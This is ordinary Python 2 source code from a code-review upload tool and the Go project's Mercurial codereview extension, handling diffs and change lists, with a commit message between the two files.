url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
new_content = RunShell(["svn", "cat", url],
universal_newlines=True, silent_ok=True)
else:
base_content = ""
else:
get_base = True
if get_base:
if is_binary:
universal_newlines = False
else:
universal_newlines = True
if self.rev_start:
# "svn cat -r REV delete_file.txt" doesn't work. cat requires
# the full URL with "@REV" appended instead of using "-r" option.
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
else:
base_content = RunShell(["svn", "cat", filename],
universal_newlines=universal_newlines,
silent_ok=True)
if not is_binary:
args = []
if self.rev_start:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:keywords", url]
keywords, returncode = RunShellWithReturnCode(cmd)
if keywords and not returncode:
base_content = self._CollapseKeywords(base_content, keywords)
else:
StatusUpdate("svn status returned unexpected output: %s" % status)
sys.exit(1)
return base_content, new_content, is_binary, status[0:5]
class GitVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Git."""
def __init__(self, options):
super(GitVCS, self).__init__(options)
# Map of filename -> (hash before, hash after) of base file.
# Hashes for "no such file" are represented as None.
self.hashes = {}
# Map of new filename -> old filename for renames.
self.renames = {}
def GenerateDiff(self, extra_args):
# This is more complicated than svn's GenerateDiff because we must convert
# the diff output to include an svn-style "Index:" line as well as record
# the hashes of the files, so we can upload them along with our diff.
# Special used by git to indicate "no such content".
NULL_HASH = "0"*40
extra_args = extra_args[:]
if self.options.revision:
extra_args = [self.options.revision] + extra_args
extra_args.append('-M')
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = os.environ.copy()
if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
gitdiff = RunShell(["git", "diff", "--no-ext-diff", "--full-index"]
+ extra_args, env=env)
svndiff = []
filecount = 0
filename = None
for line in gitdiff.splitlines():
match = re.match(r"diff --git a/(.*) b/(.*)$", line)
if match:
filecount += 1
# Intentionally use the "after" filename so we can show renames.
filename = match.group(2)
svndiff.append("Index: %s\n" % filename)
if match.group(1) != match.group(2):
self.renames[match.group(2)] = match.group(1)
else:
# The "index" line in a git diff looks like this (long hashes elided):
# index 82c0d44..b2cee3f 100755
# We want to save the left hash, as that identifies the base file.
match = re.match(r"index (\w+)\.\.(\w+)", line)
if match:
before, after = (match.group(1), match.group(2))
if before == NULL_HASH:
before = None
if after == NULL_HASH:
after = None
self.hashes[filename] = (before, after)
svndiff.append(line + "\n")
if not filecount:
ErrorExit("No valid patches found in output from git diff")
return "".join(svndiff)
def GetUnknownFiles(self):
status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
silent_ok=True)
return status.splitlines()
def GetFileContent(self, file_hash, is_binary):
"""Returns the content of a file identified by its git hash."""
data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
universal_newlines=not is_binary)
if retcode:
ErrorExit("Got error status from 'git show %s'" % file_hash)
return data
def GetBaseFile(self, filename):
hash_before, hash_after = self.hashes.get(filename, (None,None))
base_content = None
new_content = None
is_binary = self.IsBinary(filename)
status = None
if filename in self.renames:
status = "A +" # Match svn attribute name for renames.
if filename not in self.hashes:
# If a rename doesn't change the content, we never get a hash.
base_content = RunShell(["git", "show", filename])
elif not hash_before:
status = "A"
base_content = ""
elif not hash_after:
status = "D"
else:
status = "M"
is_image = self.IsImage(filename)
# Grab the before/after content if we need it.
# We should include file contents if it's text or it's an image.
if not is_binary or is_image:
# Grab the base content if we don't have it already.
if base_content is None and hash_before:
base_content = self.GetFileContent(hash_before, is_binary)
# Only include the "after" file if it's an image; otherwise it
# it is reconstructed from the diff.
if is_image and hash_after:
new_content = self.GetFileContent(hash_after, is_binary)
return (base_content, new_content, is_binary, status)
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, repo_dir):
super(MercurialVCS, self).__init__(options)
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo_dir)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
if len(out) > 1:
# Moved/copied => considered as modified, use old filename to
# retrieve base contents
oldrelpath = out[1].strip()
status = "M"
else:
status, _ = out[0].split(' ', 1)
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True)
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
def GuessVCSName():
"""Helper to guess the version control system.
This examines the current directory, guesses which VersionControlSystem
we're using, and returns an string indicating which VCS is detected.
Returns:
A pair (vcs, output). vcs is a string indicating which VCS was detected
and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
output is a string containing any interesting output from the vcs
detection routine, or None if there is nothing interesting.
"""
# Mercurial has a command to get the base directory of a repository
# Try running it, but don't die if we don't have hg installed.
# NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
try:
out, returncode = RunShellWithReturnCode(["hg", "root"])
if returncode == 0:
return (VCS_MERCURIAL, out.strip())
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have hg installed.
raise
# Subversion has a .svn in all working directories.
if os.path.isdir('.svn'):
logging.info("Guessed VCS = Subversion")
return (VCS_SUBVERSION, None)
# Git has a command to test if you're in a git tree.
# Try running it, but don't die if we don't have git installed.
try:
out, returncode = RunShellWithReturnCode(["git", "rev-parse",
"--is-inside-work-tree"])
if returncode == 0:
return (VCS_GIT, None)
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have git installed.
raise
return (VCS_UNKNOWN, None)
def GuessVCS(options):
"""Helper to guess the version control system.
This verifies any user-specified VersionControlSystem (by command line
or environment variable). If the user didn't specify one, this examines
the current directory, guesses which VersionControlSystem we're using,
and returns an instance of the appropriate class. Exit with an error
if we can't figure it out.
Returns:
A VersionControlSystem instance. Exits if the VCS can't be guessed.
"""
vcs = options.vcs
if not vcs:
vcs = os.environ.get("CODEREVIEW_VCS")
if vcs:
v = VCS_ABBREVIATIONS.get(vcs.lower())
if v is None:
ErrorExit("Unknown version control system %r specified." % vcs)
(vcs, extra_output) = (v, None)
else:
(vcs, extra_output) = GuessVCSName()
if vcs == VCS_MERCURIAL:
if extra_output is None:
extra_output = RunShell(["hg", "root"]).strip()
return MercurialVCS(options, extra_output)
elif vcs == VCS_SUBVERSION:
return SubversionVCS(options)
elif vcs == VCS_GIT:
return GitVCS(options)
ErrorExit(("Could not guess version control system. "
"Are you in a working copy directory?"))
def RealMain(argv, data=None):
"""The real main function.
Args:
argv: Command line arguments.
data: Diff contents. If None (default) the diff is generated by
the VersionControlSystem implementation returned by GuessVCS().
Returns:
A 2-tuple (issue id, patchset id).
The patchset id is None if the base files are not uploaded by this
script (applies only to SVN checkouts).
"""
logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
"%(lineno)s %(message)s "))
os.environ['LC_ALL'] = 'C'
options, args = parser.parse_args(argv[1:])
global verbosity
verbosity = options.verbose
if verbosity >= 3:
logging.getLogger().setLevel(logging.DEBUG)
elif verbosity >= 2:
logging.getLogger().setLevel(logging.INFO)
vcs = GuessVCS(options)
if isinstance(vcs, SubversionVCS):
# base field is only allowed for Subversion.
# Note: Fetching base files may become deprecated in future releases.
base = vcs.GuessBase(options.download_base)
else:
base = None
if not base and options.download_base:
options.download_base = True
logging.info("Enabled upload of base file")
if not options.assume_yes:
vcs.CheckForUnknownFiles()
if data is None:
data = vcs.GenerateDiff(args)
files = vcs.GetBaseFiles(data)
if verbosity >= 1:
print "Upload server:", options.server, "(change with -s/--server)"
if options.issue:
prompt = "Message describing this patch set: "
else:
prompt = "New issue subject: "
message = options.message or raw_input(prompt).strip()
if not message:
ErrorExit("A non-empty message is required")
rpc_server = GetRpcServer(options)
form_fields = [("subject", message)]
if base:
form_fields.append(("base", base))
if options.issue:
form_fields.append(("issue", str(options.issue)))
if options.email:
form_fields.append(("user", options.email))
if options.reviewers:
for reviewer in options.reviewers.split(','):
if "@" in reviewer and not reviewer.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % reviewer)
form_fields.append(("reviewers", options.reviewers))
if options.cc:
for cc in options.cc.split(','):
if "@" in cc and not cc.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % cc)
form_fields.append(("cc", options.cc))
description = options.description
if options.description_file:
if options.description:
ErrorExit("Can't specify description and description_file")
file = open(options.description_file, 'r')
description = file.read()
file.close()
if description:
form_fields.append(("description", description))
# Send a hash of all the base file so the server can determine if a copy
# already exists in an earlier patchset.
base_hashes = ""
for file, info in files.iteritems():
if not info[0] is None:
checksum = md5(info[0]).hexdigest()
if base_hashes:
base_hashes += "|"
base_hashes += checksum + ":" + file
form_fields.append(("base_hashes", base_hashes))
if options.private:
if options.issue:
print "Warning: Private flag ignored when updating an existing issue."
else:
form_fields.append(("private", "1"))
# If we're uploading base files, don't send the email before the uploads, so
# that it contains the file status.
if options.send_mail and options.download_base:
form_fields.append(("send_mail", "1"))
if not options.download_base:
form_fields.append(("content_upload", "1"))
if len(data) > MAX_UPLOAD_SIZE:
print "Patch is large, so uploading file patches separately."
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = rpc_server.Send("/upload", body, content_type=ctype)
patchset = None
if not options.download_base or not uploaded_diff_file:
lines = response_body.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
else:
msg = response_body
else:
msg = response_body
if not response_body.startswith("Issue created.") and \
not response_body.startswith("Issue updated."):
print >>sys.stderr, msg
sys.exit(0)
issue = msg[msg.rfind("/")+1:]
if not uploaded_diff_file:
result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
if not options.download_base:
patches = result
if not options.download_base:
vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
if options.send_mail:
rpc_server.Send("/" + issue + "/mail", payload="")
return issue, patchset
def main():
try:
RealMain(sys.argv)
except KeyboardInterrupt:
print
StatusUpdate("Interrupted.")
sys.exit(1)
Pass ui into PostMessage to avoid nasty/confusing exception
R=rsc
http://codereview.appspot.com/155079
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
#!/usr/bin/env python
#
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
from xml.etree import ElementTree as ET
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
class CL(object):
def __init__(self, name):
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.original_author = None # None means current user
def DiskText(self):
cl = self
s = ""
if cl.original_author:
s += "Author: " + cl.original_author + "\n\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.original_author:
s += "Author: " + cl.original_author + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
return s
def PendingText(self):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.original_author:
s += "\tAuthor: " + cl.original_author + "\n"
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
os.rename(path+'!', path)
if self.web and not self.original_author:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc))
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False):
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckGofmt(ui, repo, self.files, just_warn=gofmt_just_warn)
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
# Would prefer not to change the subject
# on reupload, but /upload requires it.
("subject", self.Subject()),
]
# NOTE(rsc): This duplicates too much of RealMain,
# but RealMain doesn't have the most reusable interface.
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = GuessVCS(upload_options)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
ui.status(msg + "\n")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
MySend("/" + issue + "/mail", payload="")
self.web = True
self.Flush(ui, repo)
return
def GoodCLName(name):
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.original_author = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if cl.desc == '<enter description here>':
cl.desc = '';
return cl, 0, ''
def SplitCommaSpace(s):
return s.replace(",", " ").split()
def CutDomain(s):
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
try:
f = GetSettings(name)
except:
return None, "cannot load CL %s from code review server: %s" % (name, ExceptionDetail())
if 'reviewers' not in f:
return None, "malformed response loading CL data from code review server"
cl.reviewer = SplitCommaSpace(f['reviewers'])
cl.cc = SplitCommaSpace(f['cc'])
cl.desc = f['description']
cl.url = server_url_base + name
cl.web = True
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:/'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
return dir
# Strip maximal common leading white space prefix from text
def StripCommon(text):
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
return t
# Indent text with indent.
def Indent(text, indent):
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
return t
# Return the first line of l
def line1(text):
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Return list of changed files in repository that match pats.
def ChangedFiles(ui, repo, pats, opts):
# Find list of files being operated on.
matcher = cmdutil.match(repo, pats, opts)
node1, node2 = cmdutil.revpair(repo, None)
modified, added, removed = repo.status(node1, node2, matcher)[:3]
l = modified + added + removed
l.sort()
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
matcher = cmdutil.match(repo, pats, opts)
node1, node2 = cmdutil.revpair(repo, None)
modified, added, _ = repo.status(node1, node2, matcher)[:3]
l = modified + added
l.sort()
return l
# Return list of files claimed by existing CLs
def TakenFiles(ui, repo):
return Taken(ui, repo).keys()
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
return Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
def getremote(ui, repo, opts):
# save $http_proxy; creating the HTTP repo object will
# delete it in an attempt to "help"
proxy = os.environ.get('http_proxy')
source, _, _ = hg.parseurl(ui.expandpath("default"), None)
other = hg.repository(cmdutil.remoteui(repo, opts), source)
if proxy is not None:
os.environ['http_proxy'] = proxy
return other
def Incoming(ui, repo, opts):
_, incoming, _ = repo.findcommonincoming(getremote(ui, repo, opts))
return incoming
def EditCL(ui, repo, cl):
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
clx, line, err = ParseCL(s, cl.name)
if err != '':
if ui.prompt("error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err), ["&yes", "&no"], "y") == "n":
return "change list not modified"
continue
cl.desc = clx.desc;
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
if cl.desc == '':
if ui.prompt("change list should have description\nre-edit (y/n)?", ["&yes", "&no"], "y") != "n":
continue
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=[], opts={}, globbed=False, default='relpath'):
taken = []
files = []
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if not GoodCLName(clname):
raise util.Abort("invalid CL name " + clname)
cl, err = LoadCL(repo.ui, repo, clname, web=False)
if err != '':
raise util.Abort("loading CL " + clname + ": " + err)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn=False):
files = [f for f in files if f.startswith('src/') and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
cmd.stdin.close()
except:
raise util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
#######################################################################
# Mercurial commands
server = "codereview.appspot.com"
server_url_base = None
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
"""create or edit a change list
Create or edit a change list.
